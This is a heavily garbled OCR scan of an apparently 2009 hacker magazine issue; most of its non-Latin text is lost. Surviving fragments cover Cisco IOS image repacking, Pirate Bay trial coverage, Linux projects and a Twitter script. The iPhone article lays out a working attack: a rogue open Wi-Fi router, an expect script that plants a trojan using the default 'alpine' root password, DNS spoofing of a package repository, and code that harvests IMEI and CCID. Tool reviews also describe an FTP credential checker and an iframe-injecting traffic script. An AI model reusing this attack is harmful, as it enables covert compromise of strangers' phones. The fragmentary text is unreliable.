Enterprise Services

Advanced IP Services
IS-IS, MPLS, L2/L3 VPNs, IPv6***,
Mobile Support, IP SLAs, etc.

>> IOS

IPv6***, IS-IS, IP SLAs, IBM Services,


L3 Routed Protocols, etc.

IP Services
EIGRP, OSPF, BGP, GLBP, QoS, High Availability, NAT, nBAR,
VRF-lite, Multicast, Virtual Switching System, etc.

** EIGRP-STUB in IP Base will be available on the Cisco Catalyst 4500 Series (Sup4)
and the Cisco Catalyst 6500 Series.
*** Starting with 12.2(33)SXI on the 6500 series, Cisco is offering packaging
parity for IPv6 feature support for a technology will be packaged in the same
feature set as IPv4. This parity will be expanded to other platforms in the future.

IP Base
RIP, HSRP/VRRP, StackWise, GRE, EIGRP STUB**, WCCP, etc.

LAN Base
ACL, QoS, Enhanced 802.1x, AutoQoS, AutoSecure, etc.

Layer 2 Base
Basic Ethernet L2. 802, tx. 802. ts. 802.w.
Ether Chanel, 802. 1d, Port Security. SmartPorts, SSH, etc.

. How to use?
(www.ipflow.utc.fr/index.php/Cisco_7200_Simulator), , :

<skipped>
To boot quickly, the preferred method is to decompress
the IOS image with the unzip utility. It avoids to run
the self-decompressing process in the emulator.
chris@portchris2:~/dynamips-0.2.5$ unzip -p c7200-advipservicesk9-mz.124-9.T.bin > image.bin
warning [c7200-advipservicesk9-mz.124-9.T.bin]: 27904
extra bytes at beginning or within zipfile
(attempting to process anyway)
chris@portchris2:~/dynamips-0.2.5$ file image.bin
image.bin: ELF 32-bit MSB executable, cisco 7200,
version 1 (SYSV), statically linked, stripped
You can ignore the warning, unzip has just skipped the
self-decompressing code at the beginning of the image.
Now, you can boot the imag
<skipped>

r - The image runs from ROM
l - The image is relocatable
z - The image is zip compressed
x - The image is mzip compressed

mz
zip-.
(WinZIP, WinRAR, 7zip) .

, . , deflate .
, :
7-zip 4.65 :
zip

Deflate
32B
258

: 15,7 MB (16 489 764 bytes). WinZIP


11.2 Deflate
16,0 MB (16 803 634 bytes). WinRAR 3.80,
zip : 16,3 MB (17131 353 bytes).
PKZIP 9.00 , Deflate
16,3 MB (17 094
474 bytes).

, , 7zip.
ELF HEX-

,
,
.
,
( 32-
PowerPC ),
.
, .
: Cisco IOS Configuration
Fundamentals Configuration Guide, Release 12.4 Loading and Managing
System Images, Image Naming Conventions.
:
f - The image runs from flash memory
m - The image runs from RAM

( )
.
,
WinHex, HT Editor hview. WinHex, HT, .
, IOS, ,
, ELF (Executable
and Linkable Format). ELF-
*nix-like , .
ELF- ,
1.2, , , libc elf.h. ELF-
:
ELF Header
Program Header Table (optional)
Section 1
Section 2

Section n
Section Header Table

( ),
.
MS Windows, readelf binutils.
HT (hte.sf.net),
ELF. c2600-entbasek9-mz.124-9.T1.bin, HT , .
elf.h. , ELF-,
:
typedef struct {
    Elf_Char   e_ident[EI_NIDENT];
    Elf32_Half e_type;
    Elf32_Half e_machine;
    Elf32_Word e_version;
    Elf32_Addr e_entry;
    Elf32_Off  e_phoff;
    Elf32_Off  e_shoff;
    Elf32_Word e_flags;
    Elf32_Half e_ehsize;
    Elf32_Half e_phentsize;
    Elf32_Half e_phnum;
    Elf32_Half e_shentsize;
    Elf32_Half e_shnum;
    Elf32_Half e_shstrndx;
} Elf32_Ehdr;

e_machine 0x002b 43,


SPARC v9:
#define EM_SPARCV9 43 /* SPARC v9 64-bit */

, 2611
Motorola MPC860, , 0x0014,
:
#define EM_PPC 20 /* PowerPC */

, .
. F6 elf/header. :
-

elf header size 0x34
program header entry size 0x20
program header count 1
section header entry size 0x28
section header count 6

, , 52+32+6*40=324 0x144, ,
6 (, 6 ) 1 . ,
IOS.
(, ),
. ,
<F6> elf/section headers,
:
typedef struct {
    Elf32_Word sh_name;
    Elf32_Word sh_type;
    Elf32_Word sh_flags;
    Elf32_Addr sh_addr;
    Elf32_Off  sh_offset;
    Elf32_Word sh_size;
    Elf32_Word sh_link;
    Elf32_Word sh_info;
    Elf32_Word sh_addralign;
    Elf32_Word sh_entsize;
} Elf32_Shdr;


HT
flash
sh_type .
, ,
SHT_PROGBITS, ,
. ,
, 0x00000007 ( - ). ()
(SHT_NULL).
, , . , ( sh_size).
, 0x1070e7c 17239676 .
hex- (<F6> hex) (
sh_offset) <F5>.
? ,
PK, , PKZIP-
(pkware.com/documents/casestudies/APPNOTE.TXT), 0x04034b50
? ,
22 . , ,
0xFEEDFACE
0x02AED904. , Cisco Networks Hacking Exposed McGraw
Hill/Osborne.
Andrew A. Vladimirov, Konstantin V. Gavrilenko,
Janis N. Vizulis and Andrei A. Mikhailovsky 2006 IOS 12.3(6).
, 0xFEEDFACE
uncompressed image size, compressed image
size, compressed image checksum, uncompressed image checksum.
,
. ,
, , , , ,
:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0xF6F69877
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0

( )
.
, zip-, 20 ,
0xFEEDFACE zip ( ,
0x44F8 0x1075360 + 0x44F8). 0x44F8 .
.

FEEDFACE

(5), IOS, ,
0x1070e7c 17239676 ( 20 0xFEEDFACE 0x504B0304).
, , 0xFB9D38 16489784
( 20 ).
0xB7158 749912. , , ,
0x1075360 0xFBE208!
0xFEEDFACE:
unpacked image size: 0x02AED904 45013252
packed image size: 0x01070E66 17239654 ( 5 - 22 )
packed image checksum: 0xB58BE139
unpacked image checksum: 0xA29D4F6E
: 0x504B0304

0xFEEDFACE:
unpacked image size: 0x02AED904 ( )
packed image size: 0x00FB9D22 16489762 ( 5 - 22 )
packed image checksum:
- , 0x48000000
unpacked image checksum: 0xA29D4F6E ( )

, , .
,
. 16,4
MB (17257364 bytes) 15,7 MB (16507472 bytes).
, , 749912 .
, flash, , ,
/no-squeeze-reserve-space.
flash,
. ,
, . -


rommon
<Ctrl+Break>. tftp
RAM:

Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
Processor 82A44240 20244772 8718640 11526132 10171028 10098348
I/O 3CA3400 3525632 1650536 1875096 1875096 1875068

rommon 1>tftpdnld -r
<skipped>

:
router#show flash:
TFTP flash copy: Error, image size (16507470) mismatches
netsize (16507472).

, 5 2
( 20 0xFEEDFACE + 2).
,
0xB0257B0D:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0x48000000
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0

0xFEEDFACE (
HT <F3>, <F5> <F4>, <F2>). .
rommon 4>reset -s

, IOS
.


c2600-advsecurityk9-mz.124-21.bin. , 128- 7zip,
15947076 ( 16635336),
flash. ,
RAM :
router#show version
Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version 12.4(21), RELEASE SOFTWARE (fc1)
<skipped>
router#show memory summary


System flash directory:
File Length Name/status
1 15947076 c2600-advsecurityk9-mz.124-21-shad-pk.bin
[15947140 bytes used, 830072 available, 16777212 total]
16384K bytes of processor board System flash (Read/Write)

. :
router#verify flash:c2600-advsecurityk9-mz.124-21-shad-pk.bin

, , Embedded hash
Calculated hash . 16
.
:
,
:
Embedded Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
Computed Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
CCO Hash MD5 : 79020945BDFE2A354E012C8303136360
Embedded hash verification successful.
File system hash verification successful.


. ,
:
1) PKZIP;
2) ELF;
3) Cisco IOS;
4) rommon .
, .
IDA, *nix-like ,
, , . A
. , , , ,
, .
. ... . z

>>

D0ZNP
/ HTTP://OXOD.RU /

iPhone

APPLE IPHONE

, , Apple iPhone. ,
, , .

>>

. iPhone, , .
,
. ( , ),
Win- , Nix .
, Microsoft.
: ,
( )
.
- Amoi MD-1 ( , )?
Apple iPhone !

064

.
iPhone,
, . 26
120.000 3g. ,
, 250.000 . - 370.000. , , ,
, .
3 . , ...
5-10
.

[Figure: circuit schematic, labelled "Power in from car" and "Power out to PC"]

?
.
,
.
SMS. , , !


,
? ,
, , .
, , .
- iPhone
.
:
(, 10- )
(150 !)
( )
(
PCMCIA
)
(~2000 ~8000 .
)

,
, .
SSH
, - .
, ARM
200 . USB ,
,
. Asus WL-500G,
, .

: http://wiki.openwrt.org/CompleteTableOfHardware.

, !

. :
- , (oxod.
ru). :
, , ,
. , !

.
.
openwrt, dd-wrt , .
openwrt ,
, , GPL.
, toolchain, ..
-,
. - : expect,
ssh client, sshd, http-, dns-.
openwrt, , :
http://downloads.openwrt.org/kamikaze/8.09/brcm-2.4/openwrt-brcm-2.4-squashfs.trx. 15 2009 , .
Failure Mode.
, Reset .
Reset, , . Failure Mode
,
WIKI openwrt . .
- , : ping
192.168.1.1. ,
. tftp-, :
http://www.tftp-server.com/tftp-download.html Windows;
http://packages.debian.org/lenny/tftp Debian stable.


- 12 -220 .
300

Asus WL-500G Deluxe

:
tftp 192.168.1.1
tftp> binary
tftp> trace
tftp> put openwrt-brcm-2.4-squashfs.trx

links
openwrt.org

linux
.
dd-wrt.com linux
.
code.google.
com/p/winchain
iPhone
Windows.
oxod.ru
.
. ,
.

,
( ROM). ,
,
. .
:
#~telnet 192.168.1.1
#~passwd //
#~exit //
#~ssh root@192.168.1.1 // .
SSH-

#~ipkg update //

, .
/etc/config/network.
PPPoE, :
config interface wan
        option ifname   nas0
        option proto    pppoe
        option username "username"
        option password "password"

warning

!
! ,

!

.
DHCP-, SSH- SSH-.
.

.

iPhone . ,
.. ,
SSID,
. ,
WiFi-.

, .
,

DNS ( -

!).
, ,
,
. MAC SSID, -.
,
, ,
. /etc/config/
wireless :
config wifi-device wl0
        option type     broadcom
        option channel  5
        option disabled 0
config wifi-iface
        option device   wl0
        option network  lan
        option mode     ap
        option ssid     Free_Internet
        option hidden   0
        option encryption none

DHCP-.

:).
config dhcp
        option interface lan
        option start     2 // IP-, 10.0.0.2
        option limit     100 //
        option leasetime 1h // ,
config dhcp
        option interface wan
        option ignore    1

, http://wiki.openwrt.org/OpenWrtDocs/KamikazeConfiguration (
).

. SSH

iPhone , SSHD.
, toolchain openwrt
expect. ,

- . ,

.
:
ipkg install buildroot
ipkg install make
ipkg install tcl
ipkg install scponly
ipkg install openssh-client

/etc/ssh/ssh_config,
StrictHostKeyChecking no, SSH-

. expect : http://expect.nist.gov/expect.tar.gz.
, : ./configure,
make, make install.
: setenv TCL_LIBRARY /usr/
bin/tcl8.4.19/Library. ,

-. - :
#!/usr/bin/expect
spawn scp /www/iphone-trojan root@10.0.0.2:/
usr/sbin/syslogd
expect assword {send alpine\r}
spawn ssh root@10.0.0.2
expect assword {send alpine\r}
send ldid S /usr/sbin/syslogd\r
send exit\r
expect eof


iphone-trojan, .
, .
dhcp ,
IP.
nmap ,
iPhone.

nmap O2 10.0.0.. , nmap


,
. .

. INSTALLER
.
, DNS-
Installer. , ,
, > 50% iPhone . :
, Installer .
.
. DNS-:

dvd

SMS.

#~ipkg install maradns

IP i.ripdev.com
. /etc/mararc /etc/marands/
ripdev.com:
/etc/mararc:
ipv4_bind_addresses = "127.0.0.1, 10.0.0.1"
chroot_dir = "/etc/maradns" //,
, , ,

recursive_acl = "127.0.0.1/8, 10.0.0.0/24" //

zone_transfer_acl = "127.0.0.1/8,
10.0.0.0/24" //
timeout_seconds = 2
csv1 = {}
csv1["ripdev.com."] = "ripdev.com"
dns_port = 53
maximum_cache_elements = 1024
min_ttl_cname = 900
/etc/maradns/ripdev.com:

# SOA
Sripdev.com.|86400|%|root@%|200903211634|7200|3600|
604800|1800
# NS
Nripdev.com.|86400|ns.ripdev.com.
#A
Ai.ripdev.com.|86400|10.0.0.1

.
-
. - /www,
h /
my/www-root. - . , :
http://i.ripdev.com/info/index-2.0.plist
http://i.ripdev.com/info/index-2.1.plist
http://i.ripdev.com/info/index-2.2.plist

, Installer,
date version . , ,
. IP-.

z. :
http://i.ripdev.com/info/com.ripdev.install-4.12.0.plist
http://i.ripdev.com/info/com.ripdev.install-4.12.1.plist
http://i.ripdev.com/info/com.ripdev.install-4.12.2.plist

version ,
. size hash. md5
,
.
(
/www/info /www/packages/System), .

. IPHONE
?
sms ( ). ?
iPhone.
xcode Apple SDK, gcc.
Cydia. :
http://code.google.com/p/iphone-dev/wiki/Building
http://code.google.com/p/winchain/

SMS AT /dev/tty.debug.

iPhone/iPhone 3g.
, ! code.google.
com . :

( DVD):
int InitConn(int speed)
{
int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY);
if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);
...
return fd;
}
void CloseConn(int fd)
{
tcdrain(fd);
tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs);
close(fd);
}
void SendCmd(int fd, void *buf, size_t size)
{
if(write(fd, buf, size) == -1) {
fprintf(stderr, "SendCmd error. %s\n",
strerror(errno));
exit(1);
}
}

.
, IMEI CCID.
.
AT . ReadResp
, IMEI CCID message. :

http://code.google.com/p/iphone-sms

InitConn
, CloseConn , SendCmd AT ReadResp .

068

if (strstr(readbuf,"+CMGW:")!=NULL) {
smsIndex = atoi(&readbuf[strlen(message)+10]);
}
else if (strstr(readbuf,"+CCID:")!=NULL) {

, , JTAG.

strncpy(message, &readbuf[17], 20);


}
else if (strstr(readbuf,"AT+CGSN")!=NULL) {
UCHAR temp[15];
strncpy(temp, &readbuf[10], 15);
sprintf(message,"%s-%s",message,temp);
}

main ,
. CCID,
IMEI, .
,
. , ,
. 14
, ,
802.11g. ,
. , ,
? SMS, ? , , ,
. ,
. . ,

ldid. Cydia. ,
(
).

,
. ,
, .
:
.
-
12 , 1 .
12 ,
8 16 . ,
. :
rlocman.ru/shem/schematics.html?di=33999


,
. GPS-, 12
, 1 - .
12/220
( 50 ). ,
. :
12 4.8 / ,
1 . , , . , ,
5 .
+ -,
.
, . , ,
.




. , ,
, .
,
, GPS-.
. ,
! ,
,
Apple iPhone . ,
, DDoS-
-.
iPhone. ,
,
-, ,
... - ,
. z

info



, : , ,
,
,
.

z 2009

. .


R0ID
/ R0ID@BK.RU /

>>


:WEBSMSENDER
: WINDOWS 2000/XP
:CYLAAAAN

SMS-
, :
1. -

2.
: www.
websms.ru ,
3.
-

sms-
sms-
. ,
,
- ( ).

Websmsender. - www.websms.ru.
,
sms-,
. , :
1. sms-
2.
3.
4.
5.

sms (,
).
, : 10 1 SMS
1.4 , 1 3
SMS 1.3 ..
,
,
.


,
: ,
, ,
SMS.
2-3 ,
:).
, sms-
, , -?
P.S. , sms- ,
.

: CHARON
: WINDOWS 2000/XP
: RHINO
/ - (,
). - ,
.
X-Tools , /
. , Charon.
,
,
, .
,

. :

( //etc)
IP- ( ///etc)
/
-

-
AngryIPScanner
Superscanner
-
RBL (Realtime Blackhole List)
-
(http/ssl/socks4/5)

-

-
GeoIP,
,

( thx to v1ru$, .
)

P.S. DVD.

: FTP-CHECK TOOLZ
: *NIX/WIN
: JENIZIX
FTP-,
.
: ftp-check toolz.

- .
, , :
FTP-
index-,
: [XDS] TDS
: *NIX/WIN
: XADDIS

-

,
iframe-
-


( )

(

)
, :
1. FTP_valid.txt
2. FTP_invalid.txt
3. FTP_defaced.txt
4. FTP_unknown.txt
5. FTP_info.txt ,



- /:
ftp://login:pass@server
login:pass@server

PHP 4
, chmod 777 ,
.
, ,
1-2 .

.

: GUARDMOBILE
: WINDOWS MOBILE 5/6
:MASPWARE

?
GuardMobile
Windows Mobile
, .
, :
(/)

( GPS-)
-


(
)


.
PIN- ,
.

,
- .
:


.

-

GPS-
/

( )

-/-

SIM-

,
, .

.
,
:
locate :
lock :
unlock :
keylock :
alarmon :

alarmoff :
callback :
softreset/hardreset : , ,
:)

:
#PIN#.
,
:).



( z).
[XDS] TDS.
PHP,
.
:


777
config.php

:
### ###
$usersdir='users';
### ###
$clickf='clicks.txt';
### ###
$unicf='unics.txt';
### ###
$blockf='blocked';
### ###
$startf='start.txt';
###
###
$prevf='previous.txt';
### ###
$redf='redir.txt';
###
### $host='http://www.site.com';
### ###
# $hostn='http://www.sites.com';
### ###
$passw='123';


:

iframe.php
stat.php

, , .
.z

MIFRILL
/ MIFRILL@RIDDICK.RU /

- BITTORRENT

The Pirate Bay
, .
XXI , , , ,
. , . - , ThePirateBay.org , , . ,
.


,
,

.
,

ThePirateBay.org TPB,
- . -

, ,
,
.
-
, 2004-
. TPB
.
,
:
(Gottfrid Svartholm aka
anakata), (Fredrik Neij aka

() ()

,

.
2003
Piratbyran ( ).
, . , ,


. 2006-
,

.

, , TPB, .
, ,
. ,

- -

TiAMO) (Peter
Sunde Kolmisoppi aka brokep). -

48-
(Carl Lundstrom).

( , ). ,
TPB
,
.
:
DDoS-
, ,
. , -
, - .
,
,

.
, 2006-,
, (,
).
,
. , ,
-, ,
, ,
. .

,
,
p2p-. , ,
(,
Napster, Audiogalaxy KaZaA ).
BitTorrent
, -.

, , ,
, TPB .


,

.
e-mail , ,
.
,

,

.
,
-
: 2008
TPB 3
,
25 ,
Alexa Internet 107 .
TPB .

Microsoft, Apple, SEGA, DreamWorks, Warner
Bros ,
.
,
. ,

thepiratebay.org/legal, ,
.

! TPB

31
2008, ,
.
?, Warner Bros., MGM Pictures,
Columbia Pictures, 20th Century Fox Sony BMG

, , .


,

,

$188.000.
, ,
14 .

.
,
,
,
.
The Pirate Bay, , . -,

. ,
Spectrial (
spectacle trial -).

:).

. , :
,
.
, .
.
:
, .
.
.
,
,
, .
,

,
TPB.

: -

, 16- ,
, ,
,

: All your
base are belong to bus.
-, - .
,
,
,
$60.
,

-
.
,
. twitter.com
#spectrial,
, TPB

.
,
,
, ,
. The Pirate Bay
,
.
, IFPI
( )
,
,
.
:
, , , - .

,

. ,
,
, -

TPB,

trial.thepiratebay.org,
,
.
15

The Pirate Bay ,


, .torrent-
TPB.
,
DHT,
.
, ,
. IFPI, ,
, .
,
,
,
, ,

. -
,
, ,

DHT,
.
.

: EPIC
WINNING LOL.
IFPI , ,
, , ,

?
4 , 9 22 .
The Pirate Bay
:
IFPI (
):
Sony BMG Music Entertainment
Sweden AB,
Universal Music AB,
Playground Music Scandinavia AB,
Bonnier Amigo Music Group AB,


EMI Music Sweden AB,


Warner Bros. Music Sweden AB;
Antipiratbyran (
):
Yellow Bird Films AB,
Nordisk Film,
Henrik Danstrup;
MAQS Law Firm Advokatbyra KB:
Warner Bros. Entertainment Inc,
MGM Pictures Inc,
Columbia Pictures Industries Inc,
20th Century Fox Films Co,
Mars Media Beteiligungs GmbH &

Co Filmproduktions,
Blizzard Entertainment Inc,
Sierra Entertainment Inc,
Activision Publishing Inc.

,
:
Prison Break ( ,
113)

, :
Kurt Wallander:
Wallander Den svaga punkten
Wallander Afrikanen
Wallander Mastermind
Pusher III


, :
Call of Duty 2
Diablo II
F.E.A.R.
World of Warcraft

, TPB
. , ,
, (global distribution license).
, IFPI, , Beatles Let it Be
,
. :
.
, Sony
(Svenska Antipiratbyran) , TPB
. , , .
, , , , ,
, ,
.


(Monique Wadsted).

. ,

,
.
, ,
-. ,
.
, -
, () . South park
, ,

? ,
,
. , , ,
, .
: 2000/31/EG
, .
, , The Pirate Bay .
, .
-. ... , ,

, 2006

. : , ,

TPB , ( )
(Xenu) . ,
. ,
75
. ,
, , ,
. , ,
.
,
.
, , , . ,
,
, South Park.
D ( wasted
).
,
, , , . , Google, ,
.torrent- TPB,
. , -


. .
, -, , ,
- .
, , ,
,
TPB, . , ,
,
,
TPB
. , , ,
,
, TPB ,
- . , , .

i , . ,
, , ,
, , ,
. ,
1000 , TPB, 80% -

, Google,
,
YouTube, .
, .torrent-
The Pirate Bay, .torrent-
FTP .
, .
,
.
? : ,
,
TPB ,
, , ,
, .
,
. , ,
. ,

, . ,
, IFPI

. ,
Brokep.com,
, :
.
, , ,
, , 48 , TPB?
,
, .

: VS


.
- :
?, .
: (Magnus Martensson) IFPI, 15 , (Anders
Nilsson) . ,
, ,
TPB, , ...
. , . , .
: , , DHT Peer
Exchange?
: DHT .
.
: , , ?
: . ,
, - .
: , DHT, , ,
The Pirate Bay ?
: .
,
, . ,
, , . , ,
, TPB
,
.
25- .


. :
(John Kennedy), IFPI; (Per
Sundin), Universal Music;
(Bertil Sandgren), (Svenska Filminstitutet) (Ludwig Werner)
IFPI.
, .
, , - , , ,
, . :
, .
,
.
, - The Pirate
Bay, , ,
. : ,
thepiratebay.org (
), : 50% -
- thepiratebay.org.
: , .
, .
. , ( , , )
9- . , ,
.
,
, (Kristoffer Schollin),
, .
,
BitTorrent, ,
- ,
, Intel Blizzard.
, , ,
, .
, Google,
.

,
(Roger Wallis),
. 68 40
,
39-
. , :).
6.000
. , ,
.

FINITA LA COMEDIA


,
.
.
,
IT. , ,
, 1969 ,
-.
,
,
. , ,

CD-. , - ,
. , mp3-, ,
, .
.
3- , , ,
. , ,
, , - ( ). ,
mp3- , ,
.
,
. ,
,
, - .
, : .
, , ,
- flowerstorm . ,
,
. ,
.

. ,
. TPB .
2006 , 2002. ,
, ,
- - ,
. , , , ,
, , .

, . , , . , ,
TPB
, . ,
. , , ,
,
,
. , ,
, -
.
, ,
, . ,
, ,
, , ,
IFPI.
, 17- 13:00
, .
, , ,
.
,
? , TPB ,
(
, ),
. ,
.
, ,
. , -
, .
, ,
.
TPB, ,
? , ,
,
. ,
. , The Pirate Bay
,
. , , , TPB

. z


>> unixoid
.

[Figure: bar charts with RAM and Flash panels comparing AXFS, JFFS2, CRAMFS, SQUASHFS, XIP AXFS and XIP CRAMFS]

AXFS: (), (), ( RAM/FLASH) ()

J1M
/ ZOBNIN@GMAIL.COM/


, UNIX-
,
UNIX FOSS. IT-
, .
, USENIX Linux
Symposium .
>> unixoid

KORSET HIDS
C C++
. 25 ,
.
NX-, , ,
. ,
shell-, .
. - .
, ,
.

(HIDS).
, :
,
, , .


HIDS: .
, HIDS ,
,
. HIDS
, ,
.
HIDS, , -.
,
( ,
..), .
: ,
( - SELinux
Apache ).
HIDS Korset (www.korset.org), Linux Symposium 2008,
HIDS,

. Korset Control Flow Graph
KORSET
[Figure: Korset architecture; labels: User Space, Kernel Space, System Calls, example.c, gcc, ld, ..., ELF executable, Korset Static Analyzer, example.korset, Korset Monitoring Agent, Kernel System Call Handler, read, write, close, FWRITE()]

example.c:
i=read(fd, buf, n);
if (i==n) {
    write(fd, buf, n);
}
close(fd);

, VX32
[Figure: Vx32 address space layout; labels: Host Operating System, Kernel Address Space (x86-32 or x86-64), Host Application Address Space (x86-32 or x86-64), Guest Address Space (always x86-32), Flat Model Code, Data Segments, Guest Data Segment, Guest Control Segment, guest heap (guest address space expands as heap grows), guest code, data, bss, default guest stack, guest execution state, code fragment cache, vx32 sandbox library, Host Application code, data, bss, heap (x86-32 or x86-64)]

AXFS
[Figure: AXFS image layout; labels: SUPERBLOCK, Region Descriptor (repeated), Region - file names, Region - node offsets, Region - compressed nodes, Region - xip nodes]
(CFG), ,
.

.
, ,
.
, Korset GNU
build tools (gcc, ld, as, ar) ,
CFG .
Monitoring Agent ELF, CFG ( .korset).
- security_system_call,
security_operations,
CFG. , ,
task_struct CFG .
, Korset . . -, CFG
,
. -, CFG .
shell- ,
CFG (, open(),
, ), . , -,
Korset : x86,
, ,
setjmp longjmp.

VX32

. : Chroot, FreeBSD Jail, Linux Lguest, Solaris
Zones. JavaVM , - . VMWare
qemu , ,
.
,
x86. , ,
Java, x86-,
gcc.

. API.
. ,
,
- , -,

API .
, .
, .
(
),
, ,
, API (
int call). (jmp)
( ).
. :
.
Vx32 (pdos.csail.mit.edu/~baford/vm),
USENIX08,
,
.
.

, - ,


, .
, ,
, .

, . Vx32, ,
(ds, es, ss),
-
. , Vx32
- ( : jmp
, call, int, ret) ,
,
. Vx32 ,
, Plan9, -, Linux (Linux API Vx32).

( 80%). :
x86.

KVMFS

.
,

(HPC)


.
,
.
(

).
(HPC)
(
).

x86-.

, .
Linux kvm,
qemu. qemu
, /, ,
..
qemu , , ,
, .
KvmFS, Linux Symposium 2007,
. KvmFS 9P (,
Plan9) , , Linux,
qemu
. KvmFS
qemu.
host.
org:
# mount -t 9p host.org /mnt/9
# cd /mnt/9
# tail -f clone &
# cd 0
# cp ~/disk.img fs/disk.img
# cp ~/vmstate fs/vmstate
# echo dev hda disk.img > ctl
# echo net 0 00:11:22:33:44:55 > ctl
# echo power on freeze > ctl
# echo loadvm vmstate > ctl
# echo unfreeze > ctl

:
# mount -t 9p host1.org /mnt/9/1
# mount -t 9p host2.org /mnt/9/2
# tail -f /mnt/9/2/clone &
# cd /mnt/9/1/0
# echo freeze > ctl
# echo 'clone 0 host2.org!7777/0' > ctl
# echo power off > ctl

,
,
.

AXFS RAM
Linux
. .
Linux .

,
, . Linux ,
.
( ) , ,
,
.
. , ,
/proc. ? , X Server ,
framebuffer! . ,
,
flash-.
, , :
1. .
flash-
.
2. .
3. ,
.

4. .
5. XIP (eXecute-In-Place), .. flash-, .
jffs2
, Nokia ubifs (
2.6.27) , .
XIP . .

NOR, , NAND-,
.

.
NOR- ,
, ,
RAM.
XIP , . ,
.
AXFS (Advanced XIP File System),
Linux Symposium 2008,
. 2.6.13, dcss- s390,
, flash-
( /mm/filemap_xip.c). AXFS xip- cramfs,
, . AXFS
64- ,
:
1. XIP NOR-.
2. NAND- (XIP ).
3. 4 4 .
4. , .
( ), ,
.
LIBFERRIS

. ,
. ,
API RPC.
,
: Gnome VFS,
, ssh-, ISO-;
KDE KIO, ; fuse,
. ,
Inferno Plan9,

.
libferris (www.libferris.com),
Linux Symposium, .
, (Firefox, X
Window) , XML- ,
,
, .
, libferris
,
Plan9. z


DIVER
/ DIVER@EDU.IOFFE.RU /

Linux

>> unixoid

GNU/Linux
. , , . ?
, , : Linux . ,
.
. ?
?
: Linux? , ,
. Linux ,
. ,
- ( D-Link MIPS-, Linux).
, .
- .
, 16 , MMU ( ), ucLinux.
,
.
. - , :
.
( ).
Datasheets .
(
Linux ).
? ,
, .


, ,
. , ,
.

, . SFR (Special Function Register). , .


, / , ,
.
Linux
:
1. PDC .
-
,
DMA ( ), , , . , PDC , .
2. Memory Management Unit (, -, ).
PDC .
,
. 86/86-64
, . Linux, ,
. - ,
, Linux.
NAND-Flash CompactFlash,
, , , MMU. , Ethernet
USB-Host .
, Linux,
, . :
,
,
, ,
.
, .
IBM-PC
BIOS, GRUB LILO.
Linux ,

AT91SAM9
, ,
.
-
( -,
).
, ,
, . .
, ,
, , (,
-
, ).
, . ,
.


. ,
GNU GCC toolchain,
, . GNU C
86- ,
embedded-, , , 86-. -. ARM7/9/11 , ,
GNUARM (www.gnuarm.com), AVR GNU AVR (
, gcc-avr),
51 SDCC ( Linux
).

mkfs.(_), gzip cpio.
. . -,
JTAG, .
. JTAG- LPT- (, , www.diygadget.com/store/buildingsimple-jtag-cable/info_12.html) .
JTSG , .
Linux
(DBGU) . ,
Linux .
DBGU-,

RS-232 , COM- (, COM-


).
- , cu ckermit, -

MMU ,
, ,
, . :
AT91SAM9
Dataflash NANDFlash.
SAM-BA Boot ROM . read-only
0x00, ,
. ,
.
, . SAM-BA
,
Dataflash NANDFlash 4
SRAM . SAM-BA , 0x00
. 4-
Flash-
SDRAM, ,
. ,
ARM.
MMU ,
External Bus Interface, 256 ,
.
.
(4 ) . .

Software Packages.

. , Atmel AT91SAM9
AT91 Bootstrap.
JFFS2, FAT,
Linux. .

Soekris net5501: , VPN-


COM-, .
, , Linux
-.
USB,
, , C2 ActiveSerial.
, , ,
. ,
- .

,
, - .
, - , NAND-.
( Linux )
.
,
. ,
Atmel AT91SAM9260, Linux,
- ,
Data NAND-Flash .
, , ,
,
SAM-BA Boot, , USB ,
usbserial-. , , Atmel,
.
JTAG-,
, .

Linux.

U-Boot (www.denx.de/wiki/U-Boot). .
, , ,
. , U-Boot
.
Atmel AT91SAM AVR32, linux4sam.org
avrfreaks.net. RedBoot,
, . ,
, ,
- :). ,
, -


, ,
Linux -
, ,
, , , .
,
EmDebian (www.
emdebian.org). Debian ,
,
. ,
HowTo, .
.
,
, U-boot RedBoot (www.emdebian.org/
tools/bootloader.html).
, , Debian. , , .
? , Embedded
Gentoo (www.gentoo.org/proj/en/base/embedded)! , , U-Boot.
, Linux from
Scratch, OpenEmbedded (www.
openembedded.org). , , build- BitBake
, ,
. ,
, ,
IPK, RPM, DEB tar.gz .
,
, , , . , OpenWrt
(openwrt.org),
. ,
opkg,
dpkg/apt.
sources.list
- - .
( !)
. MontaVista (www.mvista.
com) OpenMoko c Neo FreeRunner
(openmoko.org). , , ,
. Google Nokia
, Linux Android N810.
MMU, , ARM7. ucLinux (uclinux.org/ports)
.
( ), ucLinux .


,
. ,
, , ,
! z
>> coding

SPIRIT

/ HTTP://TUTAMC.COM /


Twitter Pythone


TweetTornado. -
(tweettornado.com) . ,
100 !
, ex-USSR
. z ,
,
. 4 :

. ,
( , , ,
),
, .

;
;
;
.

Python Linux
, Windows 2.5 pyCurl.
.

.
, , .

, .


TWITTER

,
.
. , Twitter (twitter.com)
,
140 . :
, ,
( following). ,
(followers), .
2006 , -
2007. 5 .
, ( ), ,
,


API

Twitter .
API, POST- GET- .
(apiwiki.twitter.com). :
URL ;
, ;
(POST GET);
;
.
, ,
. , ,

, ,
HTTP Basic Authentication.
xml
, .
API Python.

PYTHON CURL

HTTP-
, ,
cURL.
pycURL:
import pycurl

,
pycURL , .
, , ,
StringIO.
StringIO write,
. :
import StringIO
data = StringIO.StringIO()



API ,
:
import pycurl, StringIO
data = StringIO.StringIO()
curl = pycurl.Curl()
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/update.xml')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
curl.setopt(pycurl.USERPWD,'spiritua:password')
curl.setopt(pycurl.POSTFIELDS,'status=TEXT')
